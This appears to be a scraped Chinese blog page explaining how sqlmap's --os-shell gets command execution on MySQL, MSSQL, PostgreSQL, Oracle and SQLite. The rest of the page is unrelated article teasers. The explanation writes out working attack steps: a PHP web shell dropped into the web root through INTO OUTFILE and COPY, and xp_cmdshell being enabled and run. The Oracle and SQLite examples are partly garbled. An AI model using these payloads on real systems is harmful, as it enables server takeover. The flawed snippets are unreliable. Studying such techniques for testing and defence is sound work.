当前位置：首页 > news >正文

sqlmap --os-shell的原理（MySQL,MSSQL,PostgreSQL,Oracle,SQLite）

news 2025/9/22 5:17:11

1. MySQL

条件

数据库用户需要具备高权限（如 FILE 权限）。
数据库服务运行用户需要对目标目录有写权限。
Web 服务器有可写目录，且支持执行上传的脚本（如 PHP、JSP 等）。

原理

利用 MySQL 的 SELECT ... INTO OUTFILE 功能，将恶意代码写入目标 Web 目录，生成一个 Web Shell 文件。
攻击者通过浏览器访问 Web Shell，获得命令执行能力。

流程

确认 FILE 权限：

SELECT * FROM mysql.user WHERE User='target_user';

写入 Web Shell 到目标目录：

SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';

通过浏览器访问 Web Shell 执行命令：
```
http://xxxxxx.com/shell.php?cmd=whoami
```

2. Microsoft SQL Server (MSSQL)

条件

数据库用户需要 sysadmin 权限。
目标服务器启用了扩展存储过程 xp_cmdshell。
数据库运行用户有命令执行权限。

原理

调用 MSSQL 的 xp_cmdshell 存储过程，直接在操作系统中执行命令。

流程

确认是否启用了 xp_cmdshell：

EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

利用 xp_cmdshell 执行命令：
```
EXEC xp_cmdshell 'whoami';
```
通过命令的输出或回显获取执行结果。

3. PostgreSQL

条件

数据库用户需要对文件系统具有写权限。
数据库支持使用 COPY 命令将数据写入文件。
目标 Web 目录可写入文件，并允许脚本执行。

原理

利用 PostgreSQL 的 COPY 功能，将 Web Shell 写入目标文件系统。

流程

写入 Web Shell：

COPY (SELECT '<?php system($_GET["cmd"]); ?>') TO '/var/www/html/shell.php';

访问 Web Shell：
http://xxxxx.com/shell.php?cmd=id

4. Oracle

条件

数据库用户需要 CREATE LIBRARY 权限。
数据库运行用户需要访问操作系统。
利用外部过程或 Java 存储过程。

原理

通过 Oracle 数据库的外部过程，调用操作系统命令。
使用 Java 存储过程执行系统级操作。

流程

创建外部库（如 DLL 文件）：

CREATE OR REPLACE LIBRARY mylib AS '/path/to/external/file';

调用外部过程执行命令：

DECLAREcmd VARCHAR2(1000);
BEGINcmd := 'ls';DBMS_SCHEDULER.CREATE_JOB(cmd);
END;

读取命令执行结果。

5. SQLite

条件

SQLite 本身无法直接与操作系统交互。
必须结合其他漏洞（如本地文件包含）实现 Web Shell。

原理

利用 SQLite 的 ATTACH 或其他功能，尝试将恶意数据写入特定目录。

流程

写入数据：

ATTACH DATABASE '/var/www/html/shell.php' AS shell;

在 Web 服务器中访问生成的 Web Shell 文件。

总结表

数据库	条件	原理	流程简述
MySQL	`FILE` 权限，Web 目录可写	写入 Web Shell 通过 `SELECT ... INTO OUTFILE`	写 Shell -> 访问 Shell -> 执行命令
MSSQL	`sysadmin` 权限，启用 `xp_cmdshell`	使用 `xp_cmdshell` 直接执行系统命令	开启 `xp_cmdshell` -> 执行命令
PostgreSQL	写权限，Web 目录可访问	使用 `COPY` 写入 Web Shell	写 Shell -> 访问 Shell -> 执行命令
Oracle	`CREATE LIBRARY` 权限，系统访问权限	使用外部库或 Java 存储过程调用系统命令	配置库 -> 调用命令
SQLite	结合其他漏洞（如文件包含）	写入恶意数据文件，结合其他漏洞（如 LFI）访问	写 Shell -> 结合 LFI 执行

sqlmap --os-shell的原理（MySQL,MSSQL,PostgreSQL,Oracle,SQLite）

1. MySQL 条件数据库用户需要具备高权限（如 FILE 权限）。数据库服务运行用户需要对目标目录有写权限。Web 服务器有可写目录，且支持执行上传的脚本（如 PHP、JSP 等）。原理利用 MySQL 的 SELECT ... INTO OUTFIL…...

编程日记 2024/12/6 12:02:52

2024年认证杯SPSSPRO杯数学建模C题(第一阶段)云中的海盐解题全过程文档及程序

2024年认证杯SPSSPRO杯数学建模 C题云中的海盐原题再现： 巴黎气候协定提出的目标是：在2100年前，把全球平均气温相对于工业革命以前的气温升幅控制在不超过2摄氏度的水平，并为1.5摄氏度而努力。但事实上，许多之前的…...

编程日记 2024/12/6 11:59:48

三维扫描检测在汽车制造中的应用

三维扫描，通过先进三维扫描技术获取产品和物体的形面三维数据，建立实物的三维图档，满足各种实物3D模型数据获取、三维数字化展示、3D多媒体开发、三维数字化存档、逆向设计、产品开发、直接3D打印制造或辅助加工制造等一系列的应用。三维扫描…...

编程日记 2024/12/6 11:58:46

【NoSQL数据库】Hbase基本操作——数据库表的增删改查

目录一、Hbase原理二、HBase数据库操作三、遇到的问题和解决方法一、Hbase原理 HBase的数据模型： 行键时间戳列族：contents 列族：anchor 列族：mime “com.cnn.www” T9 Achor:cnnsi.com”CNN” T8 Achor:…...

编程日记 2024/12/6 11:56:42

【C++】格式化输出详解：掌握 cout 的进阶用法

博客主页： [小ᶻ☡꙳ᵃⁱᵍᶜ꙳] 本文专栏: C 文章目录 💯前言💯格式化输出的理论概述💯控制输出宽度和填充字符setw 操作符setfill 操作符 💯控制浮点数的显示格式fixed 与 scientificsetprecision 💯…...

编程日记 2024/12/6 11:55:38

设计模式学习思路二

设计模式的学习思路_设计模式必须按顺序进行吗-CSDN博客以下是一些方法和思路可以帮助你更清晰地识别使用了哪种设计模式。 1. 确定模式时的思考步骤以下是分析代码时，你可以遵循的一些思路和步骤，帮助你识别可能使用的设计模式： a. 识别…...

编程日记 2024/12/6 11:54:35

什么是等级保护

1.为什么要实施等级保护: •国家信息安全形势严峻(敌对势力),针对基础信息系统的违法犯罪持续上升(网上诈骗、入侵、网上盗窃) •维护国家安全的需求(基础信息网络【互联网、电信网、广电网】及重要信息系统【银行、铁路、电力、海关】已经成为国家的关键基础设施) •信息安全是…...

编程日记 2024/12/6 11:53:34

k8s api对象，CRD

在Kubernetes项目中，一个API对象在Etcd里的完整资源路径，是由：Group（API组）、Version（API版本）和Resource（API资源类型）三个部分组成 apiVersion: batch/v2alpha1 kind:…...

编程日记 2024/12/6 11:52:33

【C++指南】C++内存管理深度解析

💓 博客主页：倔强的石头的CSDN主页 📝Gitee主页：倔强的石头的gitee主页 ⏩ 文章专栏：《C指南》期待您的关注目录引言一、C 内存管理概述二、C内存区域划分三、C 内存管理方式 🍃1.自动内存管理…...

编程日记 2024/12/6 11:50:31

C++小碗菜之二：软件单元测试

“没有测试的代码重构不能称之为重构，它仅仅是垃圾代码的到处移动” ——Corey Haines 目录前言什么是单元测试？ 单元测试的组成单元测试的命名单元测试的独立性 Google Test 单元测试的环境配置与使用 1. Ubuntu下安装 Google Test 2. 编写…...

编程日记 2024/12/6 11:49:30

PyCharm+Selenium+Pytest配置小记

1、下载ChromeDriver： Chrome130以后的Driver下载： Chrome for Testing availabilityhttps://googlechromelabs.github.io/chrome-for-testing/ （1）查看自己Crome浏览器的版本：设置-->关于 Chrome； &…...

编程日记 2024/12/6 11:48:27

摩尔线程国产显卡 MUSA 并行编程学习笔记-2024/12/04

Learning Roadmap： Section 1: Intro to Parallel Programming & MUSA Deep Learning Ecosystem（摩尔线程国产显卡 MUSA 并行编程学习笔记-2024/11/30-CSDN博客）UbuntuDriverToolkitcondapytorchtorch_musa环境安装(2024/11/24-Ubunt…...

编程日记 2024/12/6 11:46:24

【FAQ】HarmonyOS SDK 闭源开放能力 —Remote Communication Kit

1.问题描述： DynamicDnsRule有没有示例？这个地址是怎么解析出来 https://developer.huawei.com/consumer/cn/doc/harmonyos-references/remote-communication-rcp-0000001770911890#section8160554134811 解决方案： ‘DynamicDnsRule’&a…...

编程日记 2024/12/6 11:44:15

【日常记录-Mybatis】PageHelper导致语句截断

1. 简介 PageHelper是Mybatis-Plus中的一个插件，主要用于实现数据库的分页查询功能。其核心原理是将传入的页码和条数赋值给一个Page对象，并保存到本地线程ThreadLocal中，接下来，PageHelper会进入Mybatis的拦截器环节，…...

编程日记 2024/12/6 11:39:09

随时随地掌控数据：如何使用手机APP远程访问飞牛云NAS

💝💝💝欢迎来到我的博客，很高兴能够在这里和您见面！希望您在这里可以感受到一份轻松愉快的氛围，不仅可以获得有趣的内容和知识，也可以畅所欲言、分享您的想法和见解。推荐:kwan 的首页,持续学…...

编程日记 2024/12/6 11:38:07

JVM 类加载器有哪些？双亲委派机制的作用是什么？如何自定义类加载器？

类加载器分类大家好，我是码哥，可以叫我靓仔，《Redis 高手心法》畅销书作者。先回顾下，在 Java 中，类的初始化分为几个阶段: 加载、链接（包括验证、准备和解析）和初始化。而类加载器&#x…...

编程日记 2024/12/6 11:37:05

从基态到激发态再到里德伯态的双光子激发过程

铯原子（Cs）从基态6S1/2到激发态6P3/2再到里德伯态44D5/2的双光子激发过程， 并通过数值计算和图形化展示来研究不同失谐条件下的拉比频率、AC Stark位移差以及散射概率的变化结果显示，在给定的实验参数下，拉比频率较低…...

编程日记 2024/12/6 11:36:04

Clickhouse 外部存储引擎

文章目录外部存储引擎分类MySQL引擎PostgreSQL引擎MongoDB引擎JDBC引擎ODBC引擎Kafka引擎RabbitMQ引擎File引擎URL引擎HDFS引擎外部存储引擎分类引擎类型描述特点MySQL从 MySQL 数据库中读取数据用于与 MySQL 数据库共享数据，支持读取 MySQL 表中的数据支持 SQ…...

编程日记 2024/12/6 11:35:02

eclipse怎么配置jdk路径？

在Eclipse中配置JDK路径是一个简单的步骤，以下是配置JDK路径的步骤： 打开Eclipse：启动Eclipse IDE。访问首选项： 在Eclipse的菜单栏中，选择 Window > Preferences（对于Mac OS X用户，选择 E…...

编程日记 2024/12/6 11:31:56

【前端】JavaScript 中的创建对象模式要点

博客主页： [小ᶻ☡꙳ᵃⁱᵍᶜ꙳] 本文专栏: 前端文章目录 💯前言💯对象属性值中的引号规则💯对象属性换行与尾随逗号的使用💯工厂模式：灵活高效的对象创建💯自定义构造函数：通过…...

编程日记 2024/12/6 11:26:47

华为云AI开发平台ModelArts

华为云ModelArts：重塑AI开发流程的“智能引擎”与“创新加速器”！ 在人工智能浪潮席卷全球的2025年，企业拥抱AI的意愿空前高涨，但技术门槛高、流程复杂、资源投入巨大的现实，却让许多创新构想止步于实验室。数据科学家…...

编程新知 2025/9/21 16:55:07

Objective-C常用命名规范总结

【OC】常用命名规范总结文章目录【OC】常用命名规范总结1.类名（Class Name)2.协议名（Protocol Name)3.方法名（Method Name)4.属性名（Property Name）5.局部变量/实例变量（Local / Instance Variables&…...

编程新知 2025/7/27 12:13:59

转转集团旗下首家二手多品类循环仓店“超级转转”开业

6月9日，国内领先的循环经济企业转转集团旗下首家二手多品类循环仓店“超级转转”正式开业。转转集团创始人兼CEO黄炜、转转循环时尚发起人朱珠、转转集团COO兼红布林CEO胡伟琨、王府井集团副总裁祝捷等出席了开业剪彩仪式。据「TMT星球」了解，“超级…...

编程新知 2025/8/22 5:05:39

镜像里切换为普通用户

如果你登录远程虚拟机默认就是 root 用户，但你不希望用 root 权限运行 ns-3（这是对的，ns3 工具会拒绝 root），你可以按以下方法创建一个非 root 用户账号并切换到它运行 ns-3。一次性解决方案：创建非 roo…...

编程新知 2025/9/11 11:00:29

CRMEB 框架中 PHP 上传扩展开发：涵盖本地上传及阿里云 OSS、腾讯云 COS、七牛云

目前已有本地上传、阿里云OSS上传、腾讯云COS上传、七牛云上传扩展扩展入口文件文件目录 crmeb\services\upload\Upload.php namespace crmeb\services\upload;use crmeb\basic\BaseManager; use think\facade\Config;/*** Class Upload* package crmeb\services\upload* …...

编程新知 2025/8/9 13:14:15

【Oracle】分区表

个人主页：Guiat 归属专栏：Oracle 文章目录 1. 分区表基础概述1.1 分区表的概念与优势1.2 分区类型概览1.3 分区表的工作原理 2. 范围分区 (RANGE Partitioning)2.1 基础范围分区2.1.1 按日期范围分区2.1.2 按数值范围分区 2.2 间隔分区 (INTERVAL Partit…...

编程新知 2025/9/21 23:03:18